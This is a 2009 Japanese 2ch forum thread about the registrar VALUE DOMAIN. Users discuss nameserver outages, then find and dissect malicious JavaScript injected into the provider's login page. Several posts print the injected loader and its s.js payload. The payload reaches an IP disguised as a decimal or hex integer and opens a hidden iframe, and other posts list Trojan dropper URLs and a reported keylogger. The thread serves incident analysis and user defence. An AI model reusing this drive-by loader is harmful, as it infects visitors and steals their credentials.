VALUE DOMAINってどうよ? part33

このエントリーをはてなブックマークに追加
1名無しさん@お腹いっぱい。
2名無しさん@お腹いっぱい。:2009/07/06(月) 06:19:49 0
過去スレ
VALUE DOMAINってどうよ? part31
http://pc11.2ch.net/test/read.cgi/hosting/1233882549/
VALUE DOMAINってどうよ? part30
http://pc11.2ch.net/test/read.cgi/hosting/1225092250/
VALUE DOMAINってどうよ? part29
http://pc11.2ch.net/test/read.cgi/hosting/1220946385/
VALUE DOMAINってどうよ? part28
http://pc11.2ch.net/test/read.cgi/hosting/1214506719/
3名無しさん@お腹いっぱい。:2009/07/06(月) 06:20:45 0
Q. VDが潰れたら俺のドメインどうなるの?

A.https://access.enom.com/
レジストラがeNomの場合はここでドメイン情報を操作できる
パスワードはVDの管理画面から取得できるのでメモしておくべし
Key Systems管理のドメインの場合は不明、eNomに移管した方が良いかも

補足
VDが健在の場合は定期的にVDに保存されている情報が上書きされる
またeNomで設定するにはネームサーバをeNom提供のものへ変更する必要があるので
VDのネームサーバを使ってる人は最長48時間程度のタイムラグが生じる可能性がある

詳細
http://sb.xrea.com/showthread.php?t=4836

Q. 汎用JPの場合はどうなるの?

A. JPNICと傘下のJPRSがちゃんと次の業者を指定してくれる
指定業者にするもよし、好きな業者を選ぶこともできる

実例
http://jprs.jp/info/termination/20060814.html

Q. というかVDって倒産するの?

A. XREAやCOREのサービスが不安定で2chでの評価は下がっているけどサーバは常にほぼ満員
以下のページによるとデジロック名義にしているドメインだけで14万個以上あり
単純に考えてドメイン販売だけで億単位の売り上げがある

http://whois.domaintools.com/xrea.com
4名無しさん@お腹いっぱい。:2009/07/06(月) 06:21:31 0
VDが逝く前にしておきたいドメイン防衛(gTLDの場合)

・eNom管理にする
 →VDの管理画面にログインできないときは https://access.enom.com/ から操作可能

・Whoisのドメイン管理者のメールアドレスは独自ドメイン以外の連絡のつくアドレスにする
 →移管手続きの連絡は、ここで設定されたアドレスで行われる
 →迷惑メールフィルタのあるメールがよい

・いつでも他事業者に移管できるよう、ドメインロックは外しておく
 →ドメインロックがかかっていると移管手続きができないことがある

・認証鍵(Authorization Info)はメモ、あるいはメールで送ってもらう
 →移管手続きには必要。今のうちにVDの管理画面から取得しておく

 参考
  ttp://sb.xrea.com/showthread.php?t=4836
  ttp://kazamidori.net/kaoru/web/crisis/
5名無しさん@お腹いっぱい。:2009/07/06(月) 06:22:43 0
6名無しさん@お腹いっぱい。:2009/07/06(月) 06:27:16 0
はじめて正式スレを立てました。やったw

で、前の続きですが、
http://www.value-domain.com/login.php
午前4時30分ごろから、上のログインページにログインしようとすると、
ActiveXのインストールが実行しようとされていたのですが、
今はなおってますね。午前6時26分にActivX消えました。
なんだったのでしょうか。
7名無しさん@お腹いっぱい。:2009/07/06(月) 06:29:36 0
実行元を調べると、以下だった↓
ttp://110.165.41.103:888/dir/m.htm
そして、そのIPを調べると・・・
http://safeweb.norton.com/report/show?url=110.165.41.103
↑ウイルスだーー!クラックされたかと思ったのだが、
なんだったのか・・・
8名無しさん@お腹いっぱい。:2009/07/06(月) 06:30:55 0
症状がこっちで確認できんから何もと言えんな…
自分の環境の問題って訳じゃないよな?
9名無しさん@お腹いっぱい。:2009/07/06(月) 06:36:33 0
環境の問題だけでログインページだけアクティブXでるのって
初めてだ。そういうこともあるんですね。ノートンクイックスキャンで調べたら
Cookieが検出されただけだったけど。
10名無しさん@お腹いっぱい。:2009/07/06(月) 06:59:16 0
VD・・潰れたら夜逃げってことないよな?
業務移管とかしないのかな・・。
どうせ止めるんだったら、
優秀な他の業者に業務移管して、さよならとしてほしいけど
11名無しさん@お腹いっぱい。:2009/07/06(月) 07:58:50 0
>>10
今のうちに>>4を見て、
自分でできることはやっておこうぜ、兄弟!!
12名無しさん@お腹いっぱい。:2009/07/06(月) 09:28:58 P
汎用JPは安心を買っていると思えば安いな
13名無しさん@お腹いっぱい。:2009/07/06(月) 09:58:01 0
ns鯖は今日は7時くらいから調子いいじゃん珍しく
14名無しさん@お腹いっぱい。:2009/07/06(月) 10:14:31 0
どうせそのうちまた(ry
15名無しさん@お腹いっぱい。:2009/07/06(月) 10:30:39 0
いつも通り死んでますが?w
16名無しさん@お腹いっぱい。:2009/07/06(月) 12:56:34 0
現在、弊社の無料ネームサーバーが正常動作しないというご報告を多数いただいており、最優先業務として、担当部門がネームサーバー側の確認、および、接続回線(上位プロバイダーも含みます)の確認などの緊急対応を行っております。

この不具合のため、
 ●独自ドメインへのアクセスが不安定
 ●弊社サブドメインのアクセスが不安定
という症状が発生し、その結果、
 ●メールが届いたり届かなかったりする
 ●サイトにアクセスできたりできなかったりする
 ●サーバーに設定しているドメインの設定が解除される
 ●その他、サーバー、ドメインの各種不具合が発生する
という不安定な状況になっております。

また、直接的には無関係ではございますが、
 ●レンタルカウンターの不具合
 ●レンタルチャットの不具合
などの報告もいただいております。

現時点における回避策としましては、弊社以外のネームサーバー(転送有ドメインのenom社のネームサーバーも含みます)をご利用可能な場合は、そちらに切り替えていただくことになり、新たなDNS情報が浸透後(約24〜48時間の後)にご利用可能な状態になるものと思われます。
しかしながら、弊社の無料サーバーのみをご利用の場合は、誠に申し訳ございませんが、担当部門による本症状の解決をお待ちいただく形になります。
(特にネームサーバー関係の不具合につきましては、完全に正常化されました場合であっても、おおむね48時間以内に徐々に浸透して安定していく形になり、その間、接続が不安定になる場合もございます)


不安定な状態が続いており、ご不便をおかけしておりますことを改めてお詫び申し上げますと共に、
 ━━━━━━━━━━━━
 ━━━━━━━━━━━━
 ●本ご回答から【7日間】改善をお待ちいただく
 ●再度のご連絡は【7日経過後も改善しない場合】にいただく
 ━━━━━━━━━━━━
 ━━━━━━━━━━━━
という形でのご協力をお願い申し上げます。
17名無しさん@お腹いっぱい。:2009/07/06(月) 12:57:39 0
↑ 前スレより転載


障害発生より一ヵ月以上経ちますがその後ご機嫌いかがですか社員さん
18名無しさん@お腹いっぱい。:2009/07/06(月) 13:13:09 0
変わりなく過ごしております
19名無しさん@お腹いっぱい。:2009/07/06(月) 13:24:43 0
対応出来る技術者を捜してる

とりあえず直させる

技術者逃亡

また捜す ←今ここ
20名無しさん@お腹いっぱい。:2009/07/06(月) 13:28:47 0
とっとと外注して復旧させろよ
21名無しさん@お腹いっぱい。:2009/07/06(月) 14:01:14 0
外注は去年の広告鯖ウイルス混入事件で懲りてるんじゃない?
と言っても社内にそれなりの技術者いないなら外注しなきゃ仕方無いんだろうけど。
22名無しさん@お腹いっぱい。:2009/07/06(月) 14:18:33 0
障害発生

放置

放置

放置 ←今ここ
23名無しさん@お腹いっぱい。:2009/07/06(月) 15:32:04 0
もうこりゃ復旧は無理だろ 直せるもんならとっくに直ってるよ
24名無しさん@お腹いっぱい。:2009/07/06(月) 15:35:48 P
食う

寝る

食う

寝る

100kg超え ←俺今ここ
25名無しさん@お腹いっぱい。:2009/07/06(月) 15:39:15 0
>>24
運動しろww
26名無しさん@お腹いっぱい。:2009/07/06(月) 15:41:48 0
>>6
ログインページ(SSL対応)にアクセスしたところ、
「SSLでないページが混在しています」のメッセージが出たのでおかしいなと思ったら、
ソースの326行目あたり、パスワード入力欄の下あたりに不審なJavaScriptが埋め込まれてるな

Googleキャッシュ(2009年7月3日 15:38:39 GMT)では上記のJavaScriptは存在しない
実際にウイルスかどうかは確認していないが、見た感じのソースは限りなくウイルス臭い
27名無しさん@お腹いっぱい。:2009/07/06(月) 15:45:20 0
ガチ末期ですか?
28名無しさん@お腹いっぱい。:2009/07/06(月) 16:27:52 0
なんかサポ板もバグってるみたいで収集つかなくなってるね
29名無しさん@お腹いっぱい。:2009/07/06(月) 17:22:28 0
>>6

ttp://1856317799:888/s.js
のことかな
確かにパスーワード入力欄の下に埋め込まれてる

1856317799のIPアドレスは110.165.41.103
>>7
のIPと一致するけど、
正常なスクリプトか、ウイルスか、パス抜きか・・・

なんかよく分からんが、ログインするのはヤメとくか
30名無しさん@お腹いっぱい。:2009/07/06(月) 17:29:50 0
なんだかなあ・・・
あっちもこっちもボロが出てるなぁ・・・
31名無しさん@お腹いっぱい。:2009/07/06(月) 17:31:42 0
>>29
これか・・・
<SCRIPT LANGUAGE="JAVASCRIPT">
    var js = document.createElement("script");
    js.src = "http://1856317799:888/s.js";
    try {document.getElementsByTagName('head')[0].appendChild(js);}
    catch(exp){}
    js = null;
</SCRIPT>

さっきログインしてしまった・・・orz
32名無しさん@お腹いっぱい。:2009/07/06(月) 17:41:57 0
s.jsの中身

/*dsadasdadasdasdasdas*/
if(document.cookie.indexOf(”O=”)==−1)

    var js = document.createElement(’iframe’);
    js.src = ”http:¥/¥/0x6EA52967:888/dir/show.php”;
    js.width=0;
    js.height=0;
    try {document.getElementsByTagName(’head’)[0].appendChild(js);}
    catch(exp){}
    js = null;

var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie=”O=Yes;path=/;expires=”+expires.toGMTString();
}/*dasdadadsadasdas*/
33名無しさん@お腹いっぱい。:2009/07/06(月) 17:44:36 0
何これpass抜きか何か?
34名無しさん@お腹いっぱい。:2009/07/06(月) 17:45:36 0
http://safeweb.norton.com/report/show?name=110.165.41.103

Norton セーフウェブが 110.165.41.103 を分析して安全性とセキュリティの問題を調べました。下に示すのは見つかった脅威のサンプルです。

見つかった脅威の合計: 8

脅威名: Trojan.Dropper
場所: tp://110.165.41.103:888/dir/d6.dll

脅威名: Trojan.Dropper
場所: tp://110.165.41.103:888/dir/en.dll

脅威名: Trojan.Dropper
場所: tp://110.165.41.103:888/dir/d7.dll

脅威名: Trojan.Dropper
場所: tp://110.165.41.103:888/dir/d9.dll

脅威名: Trojan.Dropper
場所: tp://110.165.41.103:888/dir/fd.dll

脅威名: Trojan.Dropper
場所: tp://110.165.41.103:888/dir/wa.dll

脅威名: Trojan.Dropper
場所: tp://110.165.41.103:888/dir/yg.dll

脅威名: Bloodhound.Exploit.193
場所: tp://110.165.41.103:888/swf/ia115-2.swf
35名無しさん@お腹いっぱい。:2009/07/06(月) 17:51:16 0
このセキュリティの甘さは何なんだお?
36名無しさん@お腹いっぱい。:2009/07/06(月) 17:53:58 0
完全に投げ出したか
37名無しさん@お腹いっぱい。:2009/07/06(月) 17:58:22 P
俺のガマン汁もそろそろ限界だ。
38名無しさん@お腹いっぱい。:2009/07/06(月) 17:58:57 0
これは
www.value-domain.com/
が乗っ取られたと解釈した方がいいのか?
39名無しさん@お腹いっぱい。:2009/07/06(月) 18:05:00 0
wikiwikiもやられてるみたいだな。GENO系統だろ。
ここの管理者が感染してFTPパス抜かれたら被害すごいことになるんじゃね?
40名無しさん@お腹いっぱい。:2009/07/06(月) 18:11:01 0
どうりで今日はデジロ社員が2ch工作してない訳だw
多分今頃、事務所は修羅場なんだろw
41名無しさん@お腹いっぱい。:2009/07/06(月) 18:11:59 0
かんべんしてよマジで
IEだとデフォルトのセキュリティ設定で警告が出てくれるけど、Firefoxだと警告すら出ないから気がつかない
42名無しさん@お腹いっぱい。:2009/07/06(月) 18:13:29 0
大丈夫かよデジロ
43名無しさん@お腹いっぱい。:2009/07/06(月) 18:16:25 0
>>40
多分、社員はまだ気がついていないんじゃないかな
javascriptを削除するくらい数分でできるはず・・・社員がサーバーへのアクセス権限を失っていたら違う意味でやばいがね
44名無しさん@お腹いっぱい。:2009/07/06(月) 18:28:27 0
もしパス抜かれてたら、パス変更したら大丈夫なの?
45名無しさん@お腹いっぱい。:2009/07/06(月) 18:28:31 P
そもそも書き換えられたことが問題。
46名無しさん@お腹いっぱい。:2009/07/06(月) 18:38:47 0
一時対応でとりあえずログインページは差し替えなきゃいけないだろ常考
差し替えたら取れなくなる資料は今のうちに取っておいて、
あとは原因追究、恒久的対応だろ
47名無しさん@お腹いっぱい。:2009/07/06(月) 18:38:49 0
初心者的質問ですまんのだが、>>29にあるようなURLでどうして接続できるの?
あと、そのURLの謎の数字1856317799から、どうやってIPアドレスが辿れるの?
教えてエロい人。
48名無しさん@お腹いっぱい。:2009/07/06(月) 18:39:08 0
とりあえず、マスコミに報告だ。

そうでもしなきゃ、隠蔽するだろ、ここ。
49名無しさん@お腹いっぱい。:2009/07/06(月) 18:40:48 0
>>47
1856317799 = 0x6EA52967 = 110.165.41.0
50名無しさん@お腹いっぱい。:2009/07/06(月) 18:41:30 0
すまん、

1856317799 = 0x6EA52967 = 110.165.41.103

51名無しさん@お腹いっぱい。:2009/07/06(月) 18:52:04 0
0xの意味が理解できてないですけど、仕組みは分かりました。エロい人ありがとう。
ネット始めて10年にもなるのに、こんな表記の方法があるなんて恥ずかしながら知らなかったw
スレ汚し失礼しました。
52名無しさん@お腹いっぱい。:2009/07/06(月) 18:57:31 0
こんな表記はスパムやウイルスのフィルターをかいくぐる目的以外では
まず使われないからな
53sage:2009/07/06(月) 19:00:14 0
>>51
なにしろマイクロソフトもうっかりしていて、IEの脆弱性になっていたくらいだからな。
54名無しさん@お腹いっぱい。:2009/07/06(月) 19:01:56 0
0xではじまるのは16進数
55名無しさん@お腹いっぱい。:2009/07/06(月) 19:02:50 0
ところで、ns1-3.value-domain.com がひけないんだが、俺だけ?
56名無しさん@お腹いっぱい。:2009/07/06(月) 19:04:48 0
110.165.32.0/19は香港のアドレスブロックか
相変わらず中国人はクソ以下だな
57名無しさん@お腹いっぱい。:2009/07/06(月) 19:05:58 0
ns2が引けないな。1と3は引ける
58名無しさん@お腹いっぱい。:2009/07/06(月) 19:08:30 0
>>55
そんなのもう5月の終わりからだぞw
59名無しさん@お腹いっぱい。:2009/07/06(月) 19:09:29 0
ネームサーバも酷いな、とりあえずenomにして
あとはポイントを全部延長して使い切ってから他へ逃げる準備しとく
60名無しさん@お腹いっぱい。:2009/07/06(月) 19:11:26 0
しっかし、これだけ対応悪いと、
過去に隠蔽された情報漏洩やハッキング被害がイパーイあるのでは?と疑いたくなる。
61名無しさん@お腹いっぱい。:2009/07/06(月) 19:13:01 0
とりあえず、ITMediaとGIGAZINEには、このスレを報告しといた。

GIGAZINE、期待してるよ。
62名無しさん@お腹いっぱい。:2009/07/06(月) 19:14:05 0
>>51
1856317799 = 110*256^3 + 165*256^2 + 41*256 + 103

0xは16進数を表す. 256=0x100だから, 16進で表せば2桁ごとに分解できる:

0x6EA52967 → 0x6E 0xA5 0x29 0x67
0x6E = 110
0xA5 = 165
0X29 = 41
0x67 = 103
63名無しさん@お腹いっぱい。:2009/07/06(月) 19:17:27 0
>>62
もういいって
ping 1856317799
とでも打てばすぐに分かることだし
64名無しさん@お腹いっぱい。:2009/07/06(月) 19:19:21 0
惰性のみでM調教受け続けてきましたがさすがにもう無理です。
ごめんなさいドSデジロご主人様。
65名無しさん@お腹いっぱい。:2009/07/06(月) 19:20:43 0
・・・ns1, ns2, ns3、すべてなにも帰ってこないぞ。
66名無しさん@お腹いっぱい。:2009/07/06(月) 19:24:00 0
>>65

>>16

先月1日あたりからアナウンスも一切無くずっと放置だよ
67名無しさん@お腹いっぱい。:2009/07/06(月) 19:28:58 P
とりあえず垢のパスは変えた方がいいのかな?どうなのかな?
68名無しさん@お腹いっぱい。:2009/07/06(月) 19:31:50 0
おちおちコンパネにログインすらできんってどうよ
移管もできねーじゃん
69名無しさん@お腹いっぱい。:2009/07/06(月) 19:32:13 0
>>66

これって死にッぱなし・・・じゃないよね?
だったらHPもメールも動かなくなるわけだし。

70名無しさん@お腹いっぱい。:2009/07/06(月) 19:35:33 0
>>69
orz.2ch.ioとかの登録されているアドレスじゃないと何も返って来ないぞ。
71名無しさん@お腹いっぱい。:2009/07/06(月) 19:44:32 P
知らずにログインしてた…
念のためJavaSciprt無効化してからログインしてパスワード変更したよ。
72名無しさん@お腹いっぱい。:2009/07/06(月) 19:57:50 0
>>67
コンパネのパスを抜かれるって事はxreaのログイン情報から
メールのパスワードまで全部つながって見えるって事だから
とりあえず、JavaSciprtをoffにしてパスワードを変更した。
7372:2009/07/06(月) 20:04:17 0
追加。
よく考えたらxreaどころじゃねぇ、
抜かれたパスワードからさらに他のパスワードに換えられたら、
こっちが何も出来ないまま、nsの変更どころかドメインを他人に移籍まで自由に出来るって事だ。
ログイン履歴をメモしておかないとな。
自分が寝ているハズの時間のログイン記録があるかもよ。
74名無しさん@お腹いっぱい。:2009/07/06(月) 20:07:31 0
わざわざ今ログインしてる人って頭XXXXX
75名無しさん@お腹いっぱい。:2009/07/06(月) 20:15:16 0
改ざんされてる割には
あまり騒いでないな
76名無しさん@お腹いっぱい。:2009/07/06(月) 20:27:01 0
JavaScriptを埋め込めるってことは、ログイン情報がポストされるPHPを改ざんすることも可能では?
つまり、JavaScriptを無効にしたところで、受け側のPHPの処理を信用できないのでログインは冒険だってことだ。
今はログインせずに、アナウンスを待つよりほかない。
77名無しさん@お腹いっぱい。:2009/07/06(月) 20:29:44 0
他社で取得したco.jpドメイン運用しているんだけど、
NS1-3.VALUE-DOMAIN.COMを指定しちゃだめってこと?

78名無しさん@お腹いっぱい。:2009/07/06(月) 20:31:10 0
まさか本当にGENO系?
それならvalue-domain.comのFTPパス抜かれたってことか
最悪だ
79名無しさん@お腹いっぱい。:2009/07/06(月) 20:36:44 0
GENO系かどうかはわからないけど、login.phpが改竄されたってことは
少なくともftpの垢パスが漏れていると言う事実は変わらない。
もしかしたらもっと上位の垢パスの可能性だってある。
80名無しさん@お腹いっぱい。:2009/07/06(月) 20:58:10 0
ログインにトロイ埋め込まれてて、香港のサーバになんか飛ばしてるのか
これ、どう処理するんだろ
適当にパスワード変更してください、って告知して、また100日無料期間追加程度で終わるのかな
81名無しさん@お腹いっぱい。:2009/07/06(月) 21:49:42 0
やばいよよばいよ
82名無しさん@お腹いっぱい。:2009/07/06(月) 21:52:07 0
まだ直ってないの?
83名無しさん@お腹いっぱい。:2009/07/06(月) 22:12:14 0
>>32のs.jsって本当にあるね……
俺、javascriptってよくわかんないんだけど、
ようするに、ログインしたら、ログインページのheadタグの後に、別のサーバのshow.phpってやつを差し込まれて何かされてるってこと?
84名無しさん@お腹いっぱい。:2009/07/06(月) 22:14:53 0
この先いったいどうなることやら
85名無しさん@お腹いっぱい。:2009/07/06(月) 22:20:19 P
http://www.value-domain.com/login.php

<SCRIPT LANGUAGE="JAVASCRIPT">
var js = document.createElement("script");
js.src = "http://1856317799:888/s.js";
try {document.getElementsByTagName('head')[0].appendChild(js);}
catch(exp){}
js = null;
</SCRIPT>


https://www.value-domain.com/login.php
<SCRIPT LANGUAGE="JAVASCRIPT">
var js = document.createElement("script");
js.src = "http://1856317799:888/s.js";
try {document.getElementsByTagName('head')[0].appendChild(js);}
catch(exp){}
js = null;
</SCRIPT>

当たり前だけ両方あるな
86名無しさん@お腹いっぱい。:2009/07/06(月) 22:27:49 P
s.jsの中身

/*dsadasdadasdasdasdas*/
if(document.cookie.indexOf("O=")==-1)
{
var js = document.createElement('iframe');
js.src = "http:\/\/0x6EA52967:888/dir/show.php";
js.width=0;
js.height=0;
try {document.getElementsByTagName('head')[0].appendChild(js);}
catch(exp){}
js = null;

var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="O=Yes;path=/;expires="+expires.toGMTString();
}/*dasdadadsadasdas*/


http:\/\/0x6EA52967:888/dir/show.php

http://110.135.41.103/dir/show.php
87名無しさん@お腹いっぱい。:2009/07/06(月) 22:31:58 0
To: 85-86

>>31-32がなぜわざわざ全角にしたのか, >>34がなぜhttpでなくtpにしたのか,
考えてみよう.
88名無しさん@お腹いっぱい。:2009/07/06(月) 22:33:17 0
>>85
>>86
既出
上で書いてあることをいちいち書き込まなくてよろしい
しかも香港鯖にリンクを貼るなや
89名無しさん@お腹いっぱい。:2009/07/06(月) 22:40:35 0
ウィルスURLを張るのは普通に通報対象です
90名無しさん@お腹いっぱい。:2009/07/06(月) 22:46:18 0
で、肝心のデジロは把握してるの?
91名無しさん@お腹いっぱい。:2009/07/06(月) 22:49:31 0
把握していないのでは?
<script>〜</script>を削除するくらい一瞬で終わる
92名無しさん@お腹いっぱい。:2009/07/06(月) 22:51:23 0
93名無しさん@お腹いっぱい。:2009/07/06(月) 22:52:08 0
試しに問題のURLを確認してみた

問題の飛ばされる先のm.htmに、ノーガードで突っ込んでみると、
XPだと、
ドライブ:/Documents and Settings/ユーザ名/Application Data
のフォルダの中に、a.exeというファイルがコピーされ、regeditいじってたら、気がついたら消えてた。実行されたのだろうか

詳細は不明
何かがやられているのは確かだ

実験するのは自己責任で
94名無しさん@お腹いっぱい。:2009/07/06(月) 22:56:05 0
つーことは、ログインするとパスが抜かれるのではなく、
ログインページを開くだけで感染するってこと?
95名無しさん@お腹いっぱい。:2009/07/06(月) 22:59:41 0
>>93に追記

ログをおったら、Keyloggerを検知した
やはりパスワード抜きで確定だと思う
96名無しさん@お腹いっぱい。:2009/07/06(月) 23:06:19 0
要は javascript 実行させない環境で見れば
問題ないのかな

普段はFireFox+ NoScriptで普段はjavascript
実行させないようにしてるけど・・・
97名無しさん@お腹いっぱい。:2009/07/06(月) 23:07:53 0
>>95に追記

カスペルスキーを実行させながら再実験するとこんな感じになった
そんなスクリーンショット
ttp://www.dotup.org/uploda/www.dotup.org209036.jpg

これは酷い
98名無しさん@お腹いっぱい。:2009/07/06(月) 23:12:33 0
login.phpに<script>を埋め込むことができるなら、
login.phpのログイン時の処理にも細工がしてある可能性もある

JavaScriptを無効にしていても、php内部の処理まではどうなっているのか分からないので、ログインしない方が無難
99名無しさん@お腹いっぱい。:2009/07/06(月) 23:13:36 P
>>93
踏んだけどなかったなぁ
そもそもそのURL鯖落ちしてないか?
100名無しさん@お腹いっぱい。:2009/07/06(月) 23:16:19 0
ttps://www.value-domain.com/login.php
にアクセスするだけで感染?
101名無しさん@お腹いっぱい。:2009/07/06(月) 23:19:14 0
>>98
確かにそうだね
しかしそろそろドメインの更新できないと困る・・・

しかも他ではあんまり扱ってないドメインだから
移管するのも面倒だし
102名無しさん@お腹いっぱい。:2009/07/06(月) 23:22:45 0
Windows以外のOSかVistaでアクセスした方がいいね
103名無しさん@お腹いっぱい。:2009/07/06(月) 23:23:20 0
>>93 >>95 >>97だけど、こうなるのは本当に全くなにも対策してない場合だけだと思う。完全にXPをノーガードの素の状態で試したから
ちゃんと最新のセキュリティソフト入ってるなら大丈夫、だとは思う
カスペルスキーを立ち上げた状態でウイルスらしき実行ファイルやったら、なんか防いでるっぽかった。ブラウザがフリーズしたけど

m.htmのほうはこんな感じ、show.phpのほうは何も吐き出してこないから、何やってるか全く不明。

正直、なんともいえんけど、
とりあえず、実験に使ったPCは念を入れて、リカバリ中
104名無しさん@お腹いっぱい。:2009/07/06(月) 23:26:20 0
>>101
ccTLDは基本的に移管できないよ
認証鍵があるtvは移管できるかもしれないけど
105名無しさん@お腹いっぱい。:2009/07/06(月) 23:27:24 0
>>102
HDDはずしてubuntuをCD-ROMブートで使うのが
セキュリティ上いいのかしら(´・ω・`)

Winのセキュリティソフトもすぐ対応してくれないと
意味ないし・・・
106名無しさん@お腹いっぱい。:2009/07/06(月) 23:28:31 0
avastは検出してくれないなぁ〜
このキーロガーは、VDのパスを狙っているのではなく、
VD利用者が日頃入力するパスを狙ってるってことかな?
107名無しさん@お腹いっぱい。:2009/07/06(月) 23:35:44 0
GENO系統ならフラッシュかPDFで感染させてFTPパスを抜いてそのパス使ってサイトの改竄する。
108名無しさん@お腹いっぱい。:2009/07/06(月) 23:42:28 0
>>102
phpの内部処理まではサーバのほうで処理することでこっちはなにも見れないから、そこまで改ざんということなら、もうOS関係ないと思う
ログインすることそれ自体が危険
109名無しさん@お腹いっぱい。:2009/07/06(月) 23:47:00 O
夕方ログインした
もう、手遅れだろうから
全部諦める事にしたよ
大規模な改ざんが来そうだね
110名無しさん@お腹いっぱい。:2009/07/07(火) 00:04:41 0
ログイン出来なきゃサポにも連絡できねえ。
問題が大きくなる前に対処しないとやばいんじゃね?
111名無しさん@お腹いっぱい。:2009/07/07(火) 00:16:30 0
今は消えてるみたい。やっと気づいたかな?
でも、相変わらず報告なしだなぁ
112名無しさん@お腹いっぱい。:2009/07/07(火) 00:20:36 0
今北
何?ログインページにロガー仕込まれたの?マジで??
今確認する分にはヘンなスクリプトは入ってなさげだけど…
マジで仕込まれていたなら事は重大だなあ

デジロは早急に今判っていることだけでもアナウンスすべき
113名無しさん@お腹いっぱい。:2009/07/07(火) 00:25:57 0
本当だ、いつのまにかなくなってる
でも、>>92で魚拓もうとられてるし、これはさすがにアナウンス無しってことはないと思・・・・・・いたい
この期間にログインしてた人は、気がついたら自分のところ改ざんされてもおかしくないしな
114名無しさん@お腹いっぱい。:2009/07/07(火) 00:26:31 0
社員がここを見て気づくというオチ
115名無しさん@お腹いっぱい。:2009/07/07(火) 00:30:46 0
多分直接関係ないとはいえ、
お知らせ欄の「セキュリティ強化について」の文字が妙にむなしく感じる…
116名無しさん@お腹いっぱい。:2009/07/07(火) 00:40:06 0
ユーザーが視認できるJavaScriptが削除されたにせよ、login.phpの内部処理が改竄されていたかどうかはユーザーには分からない。
一見対応されたかに見えても、プログラム内部の見えない部分まで確認したのかどうかは、VDのアナウンスを待つしかない。

login.phpが改竄されていたことには変わらない。
まだ危険は去っていないと考えるべきで、アナウンスがあるまでログインはおろか、
ttps://www.value-domain.com/login.php
を開くことも控えるべき
117名無しさん@お腹いっぱい。:2009/07/07(火) 00:44:17 0
DNSくらいは別に他使えばよかったけど、これはさすがにやっちまったなぁ……
VDは前、サーバー復旧できなくてサーバ丸ごと初期化したこともあったけど、
今回の問題はどこまで被害がでてるかわからないから、それなみのクラスの問題だな
118名無しさん@お腹いっぱい。:2009/07/07(火) 00:52:06 P
ふぅ、
とりあえずjs切ってパス変えて、あどべ関連も一応最新チェックしといた。

俳人(廃人)の俺がここで一句
面倒くせぇ あぁ面倒くせぇ 面倒くせぇ
119名無しさん@お腹いっぱい。:2009/07/07(火) 00:53:06 0
>>116
login.phpが書き換えられたというよりも、
login.phpから読み込まれる別のファイルなりデータベースなりが書き換えられてるような気がする。
ユーザー名、パスワード、挿入されたscriptタグが、同じ形に整えられてるからな。
よくあるSQLインジェクションみたいなもんじゃないかなー
120名無しさん@お腹いっぱい。:2009/07/07(火) 00:53:39 0
改竄されていたのは login.php だけだったのか?
という疑問も残っている。

ログイン情報は、cookieに保存されるので、各ページのphpファイル内でcookieデータが送受信される。つーことは全phpファイルに改竄がなかったかチェックする必要がある。
どのページからでも情報漏洩の危険はあるってことだ。
さらに各phpファイルが内部でインクルードしていれば、そのファイルも全てチェックする必要がある。

このくらいできるよね>VD社員
121名無しさん@お腹いっぱい。:2009/07/07(火) 00:59:41 0
とりあえずサポートフォームから
「事は重大だから最低でも朝イチでアナウンスが欲しい」
っと送っておいた
質問カテゴリ=利用前質問ならログイン無しでも送信できるしな
今の状況下でログインなんか怖くてできない
122名無しさん@お腹いっぱい。:2009/07/07(火) 01:11:13 0
スレをちゃんと読まずに、>>72>>118と同様、ログインしてパス変えてしまった

login.phpの内部処理が改竄されていた場合、ログインしたユーザーには
どんな被害があるの。whois情報が流出くらいならまだ許容できるんだけど
123名無しさん@お腹いっぱい。:2009/07/07(火) 01:12:38 0
phpまでやられてたら、サーバでできることはほとんどなんでもできるよ
124名無しさん@お腹いっぱい。:2009/07/07(火) 01:22:21 0
まあとにかく今は、VDの鯖がどの程度の被害を被ったのかアナウンスを待とうや

phpの内部処理が改竄されている可能性を考慮すると、
・JavaScriptをOFFにしてログインする
・以前のログイン情報がcookieに残っているユーザー(ログイン状態を維持しているユーザー)が、VDのサイトを開く

ってのも控えたほうがいいと思われる。

つまりアナウンスを見に行くのですら気を使う必要があるかもね
既存のcookieを削除してから訪問するとか、ブラウザを変えるとか・・・
125名無しさん@お腹いっぱい。:2009/07/07(火) 01:27:20 P
>アナウンスを待とうや

そのアナウンスが、素直に出てくるとでも思っているのかい?
126名無しさん@お腹いっぱい。:2009/07/07(火) 01:36:45 0
んなこた知るか
当然すべきことを期待しているだけだ

通信法、個人情報保護法etc・・・VDがどこまで法を犯すのかというのも楽しみではあるがね
127名無しさん@お腹いっぱい。:2009/07/07(火) 01:50:45 0
当然すべきことを期待しているだけだ(大爆笑)
128名無しさん@お腹いっぱい。:2009/07/07(火) 02:02:31 0
たまたま見たらこんなことに・・・涙
ドメイン100個以上使っているのでドビックリしてます。
129名無しさん@お腹いっぱい。:2009/07/07(火) 02:10:20 0
>>128
何度目のビックリですか?
130名無しさん@お腹いっぱい。:2009/07/07(火) 02:19:20 0
この程度でビックリしているようじゃここは使えませんよ
131名無しさん@お腹いっぱい。:2009/07/07(火) 02:28:16 0
当然すべき事を意地でも徹底放置するのがデジロじゃないかw
132名無しさん@お腹いっぱい。:2009/07/07(火) 02:33:57 0
なんでここって重大な障害等が発生してもいつも一切アナウンスしないの?
133名無しさん@お腹いっぱい。:2009/07/07(火) 02:36:43 0
重大な障害じゃないんだよ。
ここでは鯖が1台どこかに消えちゃったとかが重大な障害
134名無しさん@お腹いっぱい。:2009/07/07(火) 02:37:54 0
入金やカネに関する事はマメにアナウンスするのになw
逆に言うとそれ以外の事は一切アナウンスしないw
135名無しさん@お腹いっぱい。:2009/07/07(火) 02:39:30 0

アナウンスしたら負けだと思っています

136名無しさん@お腹いっぱい。:2009/07/07(火) 02:44:17 P
これから他の鯖屋工作員も加勢して、賑やかなスレになりそうだね。
ギガジンが記事にしたらもぅ、それこそ七夕祭りだな(ワラ
137名無しさん@お腹いっぱい。:2009/07/07(火) 02:45:41 0
分かってない奴が多いねえ
鯖の障害をアナウンスしなかったこととは、チト違ってくる
法が絡むでのぉ
138名無しさん@お腹いっぱい。:2009/07/07(火) 02:48:34 0
どんな法がどう絡んでくるの?
具体的にどうぞ。
139名無しさん@お腹いっぱい。:2009/07/07(火) 02:54:46 0
いちいち聞くな、自分で調べろ
